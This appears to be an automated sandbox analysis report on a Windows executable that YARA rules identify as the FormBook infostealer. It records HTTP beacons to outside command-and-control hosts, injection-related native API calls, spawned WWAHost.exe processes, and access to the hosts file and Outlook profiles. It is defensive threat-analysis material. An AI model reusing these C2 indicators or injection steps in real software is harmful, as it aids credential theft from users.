          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=fXcMbGDjExj3drMKkufBQsBzHfQKFTmLB4JM93eT0riZ5SFz+kUtiUeQeK0rTvuj3gbHhqJGCt4vmHgIT135jm/4dwFi2a8Vxg==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.vns96.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=Xv/upeh51eH8JUjKDjNCkuTcNeiL8VtsCg7ztHvoG96mJwKh62aGaGa8UVClz5xrnRG3Z5NRq8txS1i3c96fEoalz7dwQDKkbQ==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.thetowerbells.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: P5348574_74676.exe, 00000001.00000002.552389127.0000000000B99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.P5348574_74676.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.P5348574_74676.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.P5348574_74676.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.P5348574_74676.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.P5348574_74676.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.P5348574_74676.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: P5348574_74676.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.P5348574_74676.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.P5348574_74676.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.P5348574_74676.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.P5348574_74676.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.813282627.0000000003460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.813198167.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.813519537.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.578578399.0000000001760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_02A0E4081_2_02A0E408
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_02A0E4181_2_02A0E418
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_02A0B7BC1_2_02A0B7BC
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_083800401_2_08380040
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_083890801_2_08389080
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_08386EC81_2_08386EC8
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_083800111_2_08380011
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 1_2_08386EBE1_2_08386EBE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004058032_2_00405803
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004038832_2_00403883
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0042310A2_2_0042310A
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004229EB2_2_004229EB
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004221F12_2_004221F1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_00401B602_2_00401B60
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004223DD2_2_004223DD
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004055DA2_2_004055DA
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004055E32_2_004055E3
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004225E62_2_004225E6
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004206432_2_00420643
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004226B72_2_004226B7
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_00422F712_2_00422F71
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0042170D2_2_0042170D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0042073E2_2_0042073E
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004017C02_2_004017C0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0040BFAE2_2_0040BFAE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0040BFB32_2_0040BFB3
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_004017BF2_2_004017BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D41202_2_017D4120
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017BF9002_2_017BF900
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D99BF2_2_017D99BF
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018820A82_2_018820A8
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA8302_2_017DA830
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018828EC2_2_018828EC
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018710022_2_01871002
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0188E8242_2_0188E824
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E20A02_2_017E20A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CB0902_2_017CB090
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DAB402_2_017DAB40
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187DBD22_2_0187DBD2
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018703DA2_2_018703DA
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017DA3092_2_017DA309
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01882B282_2_01882B28
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EABD82_2_017EABD8
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017EEBB02_2_017EEBB0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018822AE2_2_018822AE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0186FA2B2_2_0186FA2B
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_018825DD2_2_018825DD
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017B0D202_2_017B0D20
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01882D072_2_01882D07
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017CD5E02_2_017CD5E0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01881D552_2_01881D55
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017E25812_2_017E2581
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017C841F2_2_017C841F
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187D4662_2_0187D466
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0188DFCE2_2_0188DFCE
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01881FF12_2_01881FF1
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017D6E302_2_017D6E30
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_01882EF72_2_01882EF7
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0187D6162_2_0187D616
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: String function: 017BB150 appears 87 times
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041E563 NtCreateFile,2_2_0041E563
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041E613 NtReadFile,2_2_0041E613
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041E693 NtClose,2_2_0041E693
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041E743 NtAllocateVirtualMemory,2_2_0041E743
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041E65D NtReadFile,2_2_0041E65D
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_0041E68F NtClose,2_2_0041E68F
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_017F9910
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F99A0 NtCreateSection,LdrInitializeThunk,2_2_017F99A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_017F9860
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9840 NtDelayExecution,LdrInitializeThunk,2_2_017F9840
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_017F98F0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9A50 NtCreateFile,LdrInitializeThunk,2_2_017F9A50
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9A20 NtResumeThread,LdrInitializeThunk,2_2_017F9A20
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_017F9A00
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9540 NtReadFile,LdrInitializeThunk,2_2_017F9540
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F95D0 NtClose,LdrInitializeThunk,2_2_017F95D0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9710 NtQueryInformationToken,LdrInitializeThunk,2_2_017F9710
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9FE0 NtCreateMutant,LdrInitializeThunk,2_2_017F9FE0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_017F97A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9780 NtMapViewOfSection,LdrInitializeThunk,2_2_017F9780
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_017F9660
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_017F96E0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9950 NtQueueApcThread,2_2_017F9950
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F99D0 NtCreateProcessEx,2_2_017F99D0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017FB040 NtSuspendThread,2_2_017FB040
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9820 NtEnumerateKey,2_2_017F9820
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F98A0 NtWriteVirtualMemory,2_2_017F98A0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9B00 NtSetValueKey,2_2_017F9B00
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017FA3B0 NtGetContextThread,2_2_017FA3B0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9A10 NtQuerySection,2_2_017F9A10
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9A80 NtOpenDirectoryObject,2_2_017F9A80
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9560 NtWriteFile,2_2_017F9560
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017FAD30 NtSetContextThread,2_2_017FAD30
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9520 NtWaitForSingleObject,2_2_017F9520
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F95F0 NtQueryInformationFile,2_2_017F95F0
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9770 NtSetInformationFile,2_2_017F9770
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017FA770 NtOpenThread,2_2_017FA770
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9760 NtOpenProcess,2_2_017F9760
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9730 NtQueryVirtualMemory,2_2_017F9730
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017FA710 NtOpenProcessToken,2_2_017FA710
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9670 NtQueryInformationProcess,2_2_017F9670
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9650 NtQueryValueKey,2_2_017F9650
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F9610 NtEnumerateValueKey,2_2_017F9610
          Source: C:\Users\user\Desktop\P5348574_74676.exeCode function: 2_2_017F96D0 NtCreateKey,2_2_017F96D0
          Source: P5348574_74676.exe, 00000001.00000000.545624947.0000000000642000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamecqdO.exe4 vs P5348574_74676.exe
          Source: P5348574_74676.exe, 00000001.00000002.556900367.0000000005C90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRegive.dll4 vs P5348574_74676.exe
          Source: P5348574_74676.exe, 00000001.00000002.552389127.0000000000B99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs P5348574_74676.exe
          Source: P5348574_74676.exe, 00000002.00000003.576480706.000000000345D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs P5348574_74676.exe
          Source: P5348574_74676.exe, 00000002.00000003.550716318.000000000156F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs P5348574_74676.exe
          Source: P5348574_74676.exe, 00000002.00000003.552036455.0000000001710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs P5348574_74676.exe
          Source: P5348574_74676.exe, 00000002.00000002.578840011.00000000018AF000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs P5348574_74676.exe
          Source: P5348574_74676.exe, 00000002.00000002.582877964.0000000003506000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs P5348574_74676.exe
          Source: P5348574_74676.exeBinary or memory string: OriginalFilenamecqdO.exe4 vs P5348574_74676.exe
          Source: P5348574_74676.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: P5348574_74676.exeReversingLabs: Detection: 58%
          Source: P5348574_74676.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\P5348574_74676.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\P5348574_74676.exe C:\Users\user\Desktop\P5348574_74676.exe
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess created: C:\Users\user\Desktop\P5348574_74676.exe C:\Users\user\Desktop\P5348574_74676.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Users\user\Desktop\P5348574_74676.exeProcess created: C:\Users\user\Desktop\P5348574_74676.exe C:\Users\user\Desktop\P5348574_74676.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exeJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\P5348574_74676.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeFile created: C:\Users\user\AppData\Local\Temp\-15B7L5MNMJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/10
          Source: P5348574_74676.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\P5348574_74676.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\P5348574_74676.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: P5348574_74676.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: P5348574_74676.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: P5348574_74676.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000003.00000002.833142897.00007FF883751000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000003.00000002.833142897.00007FF883751000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: cqdO.pdbSHA256 source: P5348574_74676.exe
          Source: Binary string: WWAHost.pdb source: P5348574_74676.exe, 00000002.00000003.576954904.0000000003532000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.576480706.000000000345D000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000002.582877964.0000000003450000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.812879939.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: P5348574_74676.exe, 00000002.00000003.576954904.0000000003532000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000003.576480706.000000000345D000.00000004.00000020.00020000.00000000.sdmp, P5348574_74676.exe, 00000002.00000002.582877964.0000000003450000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.812879939.0000000000D90000.00000040.80000000.00040000.00000000.sdmp
